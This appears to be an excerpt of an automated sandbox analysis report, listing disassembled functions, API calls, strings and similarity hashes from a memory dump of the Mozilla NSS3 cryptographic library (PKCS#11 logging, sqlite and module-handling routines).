strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CEC781D), ref: 6CEC6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CEC6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CEC6C96

Part of subcall function 6CE71240: TlsGetValue.KERNEL32(00000040,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71267
Part of subcall function 6CE71240: EnterCriticalSection.KERNEL32(?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE7127C
Part of subcall function 6CE71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71291
Part of subcall function 6CE71240: PR_Unlock.NSS3(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE712A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CEC6CAA

Strings

dbm:, xrefs: 6CEC6C3A
rdb:, xrefs: 6CEC6C69
dbm, xrefs: 6CEC6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6CEC6C91
extern:, xrefs: 6CEC6C7E
sql:, xrefs: 6CEC6C52

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: e0a76da2805265a14935920d311423179bcd70fe5fde0b18b430d4420813a058
Instruction ID: fd13089ff6d4975144c057f4288f4e266dd9ff65d2835dce6aa4b068309566c2
Opcode Fuzzy Hash: e0a76da2805265a14935920d311423179bcd70fe5fde0b18b430d4420813a058
Instruction Fuzzy Hash: 2D0184E1B0230367E95026795E4AF67366D9F8125CF340432FE14E0A81EA92E92540A7

Function 6CED4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CE978F8), ref: 6CED4E6D

Part of subcall function 6CE709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CE706A2,00000000,?), ref: 6CE709F8
Part of subcall function 6CE709E0: malloc.MOZGLUE(0000001F), ref: 6CE70A18
Part of subcall function 6CE709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CE70A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CE978F8), ref: 6CED4ED9

Part of subcall function 6CEC5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CEC7703,?,00000000,00000000), ref: 6CEC5942
Part of subcall function 6CEC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CEC7703), ref: 6CEC5954
Part of subcall function 6CEC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEC596A
Part of subcall function 6CEC5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEC5984
Part of subcall function 6CEC5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CEC5999
Part of subcall function 6CEC5920: free.MOZGLUE(00000000), ref: 6CEC59BA
Part of subcall function 6CEC5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CEC59D3
Part of subcall function 6CEC5920: free.MOZGLUE(00000000), ref: 6CEC59F5
Part of subcall function 6CEC5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CEC5A0A
Part of subcall function 6CEC5920: free.MOZGLUE(00000000), ref: 6CEC5A2E
Part of subcall function 6CEC5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CEC5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4EB3

Part of subcall function 6CED4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CED4EB8,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED484C
Part of subcall function 6CED4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CED4EB8,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED486D
Part of subcall function 6CED4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CED4EB8,?), ref: 6CED4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4EC0

Part of subcall function 6CED4470: TlsGetValue.KERNEL32(00000000,?,6CE97296,00000000), ref: 6CED4487
Part of subcall function 6CED4470: EnterCriticalSection.KERNEL32(?,?,?,6CE97296,00000000), ref: 6CED44A0
Part of subcall function 6CED4470: PR_Unlock.NSS3(?,?,?,?,6CE97296,00000000), ref: 6CED44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CFADCB0,00000000), ref: 6CED4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CED501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CE978F8), ref: 6CED506B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 6b1956cb32180e7bbaf10f6d11cd61d59b8e5fd7f72ab68ae7b633f58ddf50e2
Instruction ID: 57899d1e3ed57ce816eadae2cb0f705758c2cfb85cc09ad495d7653cc89fca33
Opcode Fuzzy Hash: 6b1956cb32180e7bbaf10f6d11cd61d59b8e5fd7f72ab68ae7b633f58ddf50e2
Instruction Fuzzy Hash: EF51E4F5D01606ABEB119F24EC0169A37B4EF1531CF26463AEC0686B12FB32E556C6D2

Function 6CE7ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7ACE2
malloc.MOZGLUE(00000001), ref: 6CE7ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE7AD02
TlsGetValue.KERNEL32 ref: 6CE7AD3C
calloc.MOZGLUE(00000001,?), ref: 6CE7AD8C
PR_Unlock.NSS3 ref: 6CE7ADC0
free.MOZGLUE(00000000), ref: 6CE7AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE7AE58
free.MOZGLUE(00000000), ref: 6CE7AE69
free.MOZGLUE(?), ref: 6CE7AE78
PR_Unlock.NSS3 ref: 6CE7AE8C
free.MOZGLUE(?), ref: 6CE7AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE7AEC7

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: d22271a4c045be488056f02054faa96c9c913519707c0b8d40be3970b952de9f
Instruction ID: 785f0795cfdfb338e75dc39601b51df4e74e5d131387ad1c9feff29b6f5835b2
Opcode Fuzzy Hash: d22271a4c045be488056f02054faa96c9c913519707c0b8d40be3970b952de9f
Instruction Fuzzy Hash: 0C51C0B0E502169BEFA0DFA9D9417AE7774FB0A34DF244026D908A3B01D731E945CBE2

Function 6CEBADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CEBADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEBAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEBAE29

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEBAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CEBAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEBAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CEBAEA0

Strings

C_MessageSignInit, xrefs: 6CEBADE1
hKey = 0x%x, xrefs: 6CEBAE62, 6CEBAE72
hSession = 0x%x, xrefs: 6CEBAE01, 6CEBAE11
(CK_INVALID_HANDLE), xrefs: 6CEBAE1F, 6CEBAE80

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 5f81fc340dbb7304b6ba7f2358abd0db225d8b44518e82648ce1a228fd7b594b
Instruction ID: 77f4e0033c885d3ea3d722553476335f0ee422d598d8d0a27fc42480a578b1c2
Opcode Fuzzy Hash: 5f81fc340dbb7304b6ba7f2358abd0db225d8b44518e82648ce1a228fd7b594b
Instruction Fuzzy Hash: 35311331A40108FBDF849F54DE88BBE7775AB4A30DF144428F408BBB11DB359949CBA1

Function 6CEB9EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CEB9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB9F49

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CEB9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6CEB9FC0

Strings

C_MessageEncryptInit, xrefs: 6CEB9F01
hKey = 0x%x, xrefs: 6CEB9F82, 6CEB9F92
hSession = 0x%x, xrefs: 6CEB9F21, 6CEB9F31
(CK_INVALID_HANDLE), xrefs: 6CEB9F3F, 6CEB9FA0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: 285e4fe3200fe9b0b2e6dbca81893bc8f5acd84cec6334a9e43f551ef66d2015
Instruction ID: 12f25fda9e46ebd5e0584614f251aca874a3cc593a2b2ecc15ba8d4fa1185f43
Opcode Fuzzy Hash: 285e4fe3200fe9b0b2e6dbca81893bc8f5acd84cec6334a9e43f551ef66d2015
Instruction Fuzzy Hash: 6E313531A00209FBDB84DF54DE89BBE7776AB4A31CF144428F408B7B52DB359909CB91

Function 6CF54C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CF54CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF54CFD
sqlite3_value_text16.NSS3(?), ref: 6CF54D44

Strings

bad parameter or other API misuse, xrefs: 6CF54D05
out of memory, xrefs: 6CF54C78, 6CF54C9E
another row available, xrefs: 6CF54D20
unknown error, xrefs: 6CF54D56
invalid, xrefs: 6CF54CF1
abort due to ROLLBACK, xrefs: 6CF54D27, 6CF54D33
API call with %s database connection pointer, xrefs: 6CF54CF6
no more rows available, xrefs: 6CF54D2E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 170a493b1aeecb09335f3fee6bb111be72557a0d620d866bc7f6eac8906d9d0e
Instruction ID: 9d46b97f3a0bb891fd986e72e1f0701fa497f54bb14d2efa3100211ef52155f7
Opcode Fuzzy Hash: 170a493b1aeecb09335f3fee6bb111be72557a0d620d866bc7f6eac8906d9d0e
Instruction Fuzzy Hash: 06316C73E08911A7E7084629A8097E6BF727BE3318FD50129DB245BE58C721BC71C3E2

Function 6CEB2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CEB2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB2E33

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CEB2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CEB2E81

Strings

pPin = 0x%p, xrefs: 6CEB2E63
C_InitPIN, xrefs: 6CEB2DF1
ulPinLen = %d, xrefs: 6CEB2E7C
hSession = 0x%x, xrefs: 6CEB2E0E, 6CEB2E1E
(CK_INVALID_HANDLE), xrefs: 6CEB2E2C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: d10c6209ac1e4cde95c0b7409536569d4c6ae22ce0ecc3df7acc943c59e73c10
Instruction ID: 0f7ab7017ab3785a0c1520070e8d4435af5e43d1da5e9cdff8ed811056763ff0
Opcode Fuzzy Hash: d10c6209ac1e4cde95c0b7409536569d4c6ae22ce0ecc3df7acc943c59e73c10
Instruction Fuzzy Hash: F1312371A11109BFDB85DB55DE4CB6A7B71EF4A31CF144028F808A7B11EB319D09CBA2

Function 6CEB6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CEB6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB6F53

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CEB6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CEB6FA1

Strings

C_DigestUpdate, xrefs: 6CEB6F11
pPart = 0x%p, xrefs: 6CEB6F83
ulPartLen = %d, xrefs: 6CEB6F9C
hSession = 0x%x, xrefs: 6CEB6F2E, 6CEB6F3E
(CK_INVALID_HANDLE), xrefs: 6CEB6F4C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 015cf8a33accb18336984266d61818c36542a67041e038d4aae3f668aa6fbe0b
Instruction ID: d57b0ab04a47425cf7bceda6fe871cdc17660218305b4d35c24464cb095c7236
Opcode Fuzzy Hash: 015cf8a33accb18336984266d61818c36542a67041e038d4aae3f668aa6fbe0b
Instruction Fuzzy Hash: 4B31F530A11104AFEB84DF64DE49B6A77B5EB4A31DF194428E908A7B11DF329D09CBA1

Function 6CEB7E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6CEB7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB7E63

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CEB7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CEB7EB1

Strings

C_VerifyUpdate, xrefs: 6CEB7E21
pPart = 0x%p, xrefs: 6CEB7E93
ulPartLen = %d, xrefs: 6CEB7EAC
hSession = 0x%x, xrefs: 6CEB7E3E, 6CEB7E4E
(CK_INVALID_HANDLE), xrefs: 6CEB7E5C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: b941a911a876e7526e652883a3cbe5da7e43bc76663862cc2b2af2d21aafaf3e
Instruction ID: ca45575e47c90e8254e7e254fff3b91abf0d62262c44a8cac9b7ed44de7cf787
Opcode Fuzzy Hash: b941a911a876e7526e652883a3cbe5da7e43bc76663862cc2b2af2d21aafaf3e
Instruction Fuzzy Hash: E731F534E01109FFDB809B64DE48BAA7BB1AF4A31CF154428F808A7B11DB359D09CBA1

Function 6CEB7F30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6CEB7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB7F93

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CEB7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CEB7FE1

Strings

ulSignatureLen = %d, xrefs: 6CEB7FDC
pSignature = 0x%p, xrefs: 6CEB7FC3
C_VerifyFinal, xrefs: 6CEB7F51
hSession = 0x%x, xrefs: 6CEB7F6E, 6CEB7F7E
(CK_INVALID_HANDLE), xrefs: 6CEB7F8C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal
API String ID: 1003633598-3315179127
Opcode ID: b91b0c5c8ca2aae900a5c233e48c73ee78f706b5bcfe9a0bb70258119aa65701
Instruction ID: e42e78d6be16deb21a1ffa2d7a2b97d938ffe1d786977b35fc31b73712dc9f83
Opcode Fuzzy Hash: b91b0c5c8ca2aae900a5c233e48c73ee78f706b5bcfe9a0bb70258119aa65701
Instruction Fuzzy Hash: 8A313730A01009FFEB84DB54DE49FAA7BB1EB4A31DF144425E808A7B11DB319D49CBB5

Function 6CF52D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CF52D9F

Part of subcall function 6CE0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CE6F9C9,?,6CE6F4DA,6CE6F9C9,?,?,6CE3369A), ref: 6CE0CA7A
Part of subcall function 6CE0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CE0CB26

sqlite3_exec.NSS3(?,?,6CF52F70,?,?), ref: 6CF52DF9
sqlite3_free.NSS3(00000000), ref: 6CF52E2C
sqlite3_free.NSS3(?), ref: 6CF52E3A
sqlite3_free.NSS3(?), ref: 6CF52E52
sqlite3_mprintf.NSS3(6CFBAAF9,?), ref: 6CF52E62
sqlite3_free.NSS3(?), ref: 6CF52E70
sqlite3_free.NSS3(?), ref: 6CF52E89
sqlite3_free.NSS3(?), ref: 6CF52EBB
sqlite3_free.NSS3(?), ref: 6CF52ECB
sqlite3_free.NSS3(00000000), ref: 6CF52F3E
sqlite3_free.NSS3(?), ref: 6CF52F4C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

